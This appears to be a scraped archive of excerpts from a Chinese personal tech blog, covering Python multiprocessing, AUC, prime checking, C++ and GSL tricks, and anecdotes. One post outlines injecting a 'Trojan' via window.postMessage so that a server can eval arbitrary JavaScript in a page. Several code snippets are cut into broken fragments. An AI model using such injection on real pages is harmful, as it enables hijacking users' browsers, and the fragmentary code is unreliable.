todwang.blogspot.com
王元涛的Blog: April 2012
http://todwang.blogspot.com/2012_04_01_archive.html
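One day QA asked me to write a program to process a very large text file, usually a few hundred MB and sometimes several GB. The file is a sequence of JSON objects printed one after another; they have to be parsed and then reprinted in the format QA prefers. I first wrote a single-threaded version and found it very slow, with the CPU at 100%. My guess was that parsing the JSON was the bottleneck. for line in sys.stdin: if line[0] == '}': def handle(buf, m): o = json.loads(buf). I remembered that Python threads are not truly parallel: on a multi-core machine the CPU usage still stays at 100% of one core. So I went straight to multiple processes. buf_queue = multiprocessing.Queue(). for buf in iter(q.get, None): for i in xrange(23): multiprocessing.Process(target=process, args=(buf_queue,)).start(). for line in sys.stdin: if line[0] == '}': iter(q.get, None). pool = multiprocessing.Pool(). print ...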
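The approach described above can be sketched roughly as follows. This is a minimal Python 3 sketch, not the post's actual program: it assumes each top-level JSON object ends on a line that starts with `}` (as the `line[0]` check suggests), and `split_objects`, `process_all`, and the compact re-serialization inside `handle` are hypothetical stand-ins for the parts the excerpt cuts off.

```python
import json
import multiprocessing


def split_objects(lines):
    """Yield the text of one JSON object at a time.

    Assumes every top-level object ends on a line starting with '}'.
    """
    buf = []
    for line in lines:
        buf.append(line)
        if line.startswith("}"):
            yield "".join(buf)
            buf = []


def handle(buf):
    # Hypothetical reformatting step: parse, then print compactly.
    obj = json.loads(buf)
    return json.dumps(obj, sort_keys=True)


def process_all(lines, workers=2):
    """Parse objects in worker processes; results keep the input order."""
    with multiprocessing.Pool(workers) as pool:
        # chunksize batches objects to reduce inter-process overhead.
        return list(pool.imap(handle, split_objects(lines), chunksize=64))
```

To use it on a real file, call `process_all(sys.stdin)` from under an `if __name__ == "__main__":` guard, since multiprocessing may re-import the main module on platforms that spawn workers instead of forking.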
王元涛的Blog: Demographic prediction over aggregated data set
http://todwang.blogspot.com/2013/06/demographic-prediction-over-aggregated.html
Demographic prediction over aggregated data set. Sometimes you do not have the explicit demographic data you want, P(D|C), where C is the content (page, video, game, or whatever you offer) the visitor is consuming and D is the visitor's demographic bucket, but you can get an aggregated report from a third party in this schema: P(A,D), where A is the advertisement. For a fixed demographic bucket D, we have a linear equation: P(A|D) = SUM{P(A|C) * P(C|D), for each C}. Audience has some demographic property and as a...
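To make the linear equation concrete, here is a small sketch with made-up numbers (two ads, two pieces of content). The excerpt does not show how the post goes on to solve the system, so treating P(A|C) as known and recovering P(C|D) by Cramer's rule is only an assumption for illustration; `mix` and `solve_2x2` are hypothetical helper names.

```python
def mix(p_a_given_c, p_c_given_d):
    """P(A|D) = sum over C of P(A|C) * P(C|D), for one fixed bucket D.

    p_a_given_c[a][c] is P(A=a | C=c); p_c_given_d[c] is P(C=c | D).
    """
    n_content = len(p_c_given_d)
    return [sum(row[c] * p_c_given_d[c] for c in range(n_content))
            for row in p_a_given_c]


def solve_2x2(m, b):
    """Solve m * x = b for a 2x2 matrix m by Cramer's rule."""
    det = m[0][0] * m[1][1] - m[0][1] * m[1][0]
    if abs(det) < 1e-12:
        raise ValueError("the columns of P(A|C) are not linearly independent")
    x0 = (b[0] * m[1][1] - m[0][1] * b[1]) / det
    x1 = (m[0][0] * b[1] - b[0] * m[1][0]) / det
    return [x0, x1]


# Made-up inputs: each column of P_A_GIVEN_C sums to 1.
P_A_GIVEN_C = [[0.7, 0.2],
               [0.3, 0.8]]
P_C_GIVEN_D = [0.6, 0.4]

# Forward direction: what the aggregated report would show for bucket D.
p_a_given_d = mix(P_A_GIVEN_C, P_C_GIVEN_D)

# Reverse direction: recover P(C|D) from the report.
recovered = solve_2x2(P_A_GIVEN_C, p_a_given_d)
```

With more ads than content items the system is overdetermined, and a least-squares fit would be the natural replacement for the exact solve.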
王元涛的Blog: September 2012
http://todwang.blogspot.com/2012_09_01_archive.html
My Adventure to "Wacity". As people get older they grow nostalgic. Bored at home alone over the weekend, I was sorting through old files and dug out an assignment from a 2005 English writing class. It turns out my imagination was really sharp when I was young. My Adventure to Wacity. I would like to tell you about my adventure to a wacity last Friday, which was very exciting. I am a farmer in 31 century, and now the scientists can enable people to breathe and live in the water as in the air. So years ago, my family emigrate to a village down the sea, earning lives by growing coral. Hey, where are you from, freshman? But where are the wacars? I asked an old woman in the str...
王元涛的Blog: April 2013
http://todwang.blogspot.com/2013_04_01_archive.html
Use window.postMessage to hack a page. Just wondering whether I can inject a Trojan into a page so that my server can make the client run arbitrary JavaScript. Here is a solution: https://developer.mozilla.org/en-US/docs/DOM/window.postMessage. Press F12 in Chrome and paste the following JS code into the Console: body = document.getElementsByTagName(. iframe = document.createElement(. iframe.src = . eval(. receiveMessage, . iframe.contentWindow.postMessage(. Date().toString();. The ma...
王元涛的Blog: use window.postMessage to hack a page
http://todwang.blogspot.com/2013/04/use-windowpostmessage-to-hack-page.html
王元涛的Blog: March 2012
http://todwang.blogspot.com/2012_03_01_archive.html
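After lunch yesterday, once again nobody wanted to do the dishes. So my wife said: "Let's roll the die a different way this time. If I roll three times in a row without landing on 'wash the dishes', you wash them; otherwise I will." I said fine. Then I did the math and said: no, it has to be 4 rolls. And then... I went to wash the dishes. One day a colleague quizzed me with a C++ question about copy construction of STL containers. std::vector<int> v; a.v.push_back(9); printf("%d %d %d %d\n", a.v.size(), b.v.size(), a.v[0], b.v[0]); a.v[0] = 8; printf("%d %d %d %d\n", a.v.size(), b.v.size(), a.v[0], b.v[0]); https://www.kddcup2012.org/c/kddcup2012-track2/. Static attributes of the ad, referencing purchasedkeyword_tokensid.txt. Spent an evening downloading the 2 GB data file; it is 11 GB after decompression. 0 1 9279176529507935999 10810874 23649 1 1 1647439 373861 816959 727055 766180.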
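The arithmetic behind "it has to be 4 rolls" in the dish-washing anecdote above can be checked with a few lines. This is only a sketch: the excerpt does not describe the die, so a fair six-sided die with exactly one "wash the dishes" face is an assumption, and `p_no_hit` is a hypothetical helper name.

```python
from fractions import Fraction


def p_no_hit(rolls, faces=6):
    """Chance that `rolls` throws of a fair die never show the one 'dishes' face."""
    return Fraction(faces - 1, faces) ** rolls


# Probability that the husband ends up washing, for 3 and 4 rolls.
for n in (3, 4):
    p = p_no_hit(n)
    print(n, p, round(float(p), 4))
```

Under that assumption the husband washes with probability 125/216 (about 0.58) after three rolls, and 625/1296 (about 0.48) after four, so four rolls is the closest the game gets to an even split.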
王元涛的Blog: June 2012
http://todwang.blogspot.com/2012_06_01_archive.html
If you want every operation to happen on the stack, consider the following, which relies on the memory layout of a native C two-dimensional array matching the layout that gsl_matrix assumes: the contents of each row are stored contiguously. #include <gsl/gsl_matrix.h> #define init_matrix(src, dst) gsl_matrix dst; dst.size1 = sizeof(src) / sizeof(src[0]); dst.tda = dst.size2 = sizeof(src[0]) / sizeof(src[0][0]); dst.data = (double*)(void*)src; dst.block = NULL; dst.owner = false; for(int i=0;i<3;++i)for(int j=0;j<4;++j)x[i][j]=1+i+0.1*(1+j); init_matrix(x, a); gsl_matrix_scale(&a, 100); gsl_matrix_fprintf(stdout, &a, "%g"); One day a colleague recommended a book to me about the C++ object model. struct B{ char c;};
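The layout assumption in the gsl_matrix trick above can be illustrated without GSL. The sketch below is plain Python, not the post's C code: it emulates a C array `double x[3][4]` as a flat list and checks that element (i, j) sits at offset `i * tda + j`, which is how GSL addresses matrix elements. The helper `at` is a hypothetical name.

```python
ROWS, COLS = 3, 4

# Same fill as the loop in the post: x[i][j] = 1 + i + 0.1 * (1 + j)
x = [[1 + i + 0.1 * (1 + j) for j in range(COLS)] for i in range(ROWS)]

# A C two-dimensional array stores its rows back to back in memory.
flat = [value for row in x for value in row]

# With no padding between rows, the row stride equals the column count,
# which is why the macro sets tda and size2 to the same value.
tda = COLS


def at(data, stride, i, j):
    """Read element (i, j) from row-major storage with the given row stride."""
    return data[i * stride + j]
```

Because the stride and the column count coincide here, pointing `data` at the array is enough; a sub-matrix view would need `tda` larger than `size2`.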
王元涛的Blog: Fwd: An interesting property of AUC
http://todwang.blogspot.com/2013/12/fwd-interesting-property-of-auc.html
Fwd: An interesting property of AUC. Get the definition of AUC here: http://en.wikipedia.org/wiki/Receiver_operating_characteristic. Property: if you flip the ground truth only, or flip the prediction only, the new AUC is 1 minus the original AUC. Take the original ROC curve as a function of the moving score threshold s: (x(s), y(s)) = (fp(s)/N, tp(s)/P), where fp(s) is the false positive count, i.e. the number of cases predicted positive under score threshold s that are actually negative, N is the number of negative cases, and P is the number of positive cases.
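The flip property can be checked numerically. The sketch below does not trace the ROC curve as the post does; it uses the equivalent pairwise formulation (the fraction of positive/negative pairs ranked correctly, ties counting one half). The data and the function name `auc` are made up for illustration.

```python
def auc(labels, scores):
    """AUC as the fraction of (positive, negative) pairs ranked correctly.

    Ties count as half a correct pair.
    """
    pos = [s for y, s in zip(labels, scores) if y == 1]
    neg = [s for y, s in zip(labels, scores) if y == 0]
    wins = 0.0
    for p in pos:
        for n in neg:
            if p > n:
                wins += 1.0
            elif p == n:
                wins += 0.5
    return wins / (len(pos) * len(neg))


# Made-up example data.
labels = [1, 0, 1, 1, 0, 0]
scores = [0.9, 0.8, 0.7, 0.4, 0.3, 0.2]

original = auc(labels, scores)
flipped_truth = auc([1 - y for y in labels], scores)   # flip ground truth only
flipped_pred = auc(labels, [-s for s in scores])       # flip prediction only
```

Flipping the labels swaps the roles of the positive and negative sets, and negating the scores reverses every comparison, so in both cases each correctly ranked pair becomes an incorrectly ranked one.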
王元涛的Blog: Prime Checker With Cache
http://todwang.blogspot.com/2013/06/prime-checker-with-cache.html
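Prime Checker With Cache. def isPrim(self, test): if test <= self.maxTested: return test in self.primeSet # test and update cache for i in range(self.maxTested + 1, test + 1): if not any([i % p == 0 for p in self.primeSet]): return test in self.primeSet. Initialization: the state is set by hand, so the invariant holds. Maintenance: note that the number added to primeSet each time is always the smallest natural number not divisible by any known prime, that is, the smallest prime outside primeSet. So the invariant is maintained. About prime density (the number of primes not exceeding n, divided by n), I recently learned a few interesting facts. 3. Primes are denser than perfect squares :) bet you did not expect that. http://en.wikipedia.org/wiki/Prime_number_theorem.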
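A runnable version of the cached checker might look like the sketch below. The names `isPrim`, `maxTested`, and `primeSet` come from the excerpt; the class name `PrimeChecker`, the initial state `{2}` with `maxTested = 2`, and the lines that add to the set and advance `maxTested` are assumptions filling in what the excerpt omits.

```python
class PrimeChecker:
    def __init__(self):
        # Invariant: primeSet holds exactly the primes <= maxTested.
        # Assumed initial state, set by hand as the post describes.
        self.primeSet = {2}
        self.maxTested = 2

    def isPrim(self, test):
        # Anything already covered by the cache is a set lookup.
        if test <= self.maxTested:
            return test in self.primeSet
        # Test and update cache, extending it one number at a time.
        for i in range(self.maxTested + 1, test + 1):
            # i is prime exactly when no smaller prime divides it.
            if not any(i % p == 0 for p in self.primeSet):
                self.primeSet.add(i)
            self.maxTested = i
        return test in self.primeSet


checker = PrimeChecker()
primes_to_100 = sum(checker.isPrim(n) for n in range(1, 101))
```

After that loop the cache holds the 25 primes up to 100, against only 10 perfect squares in the same range, which matches the density remark in the post.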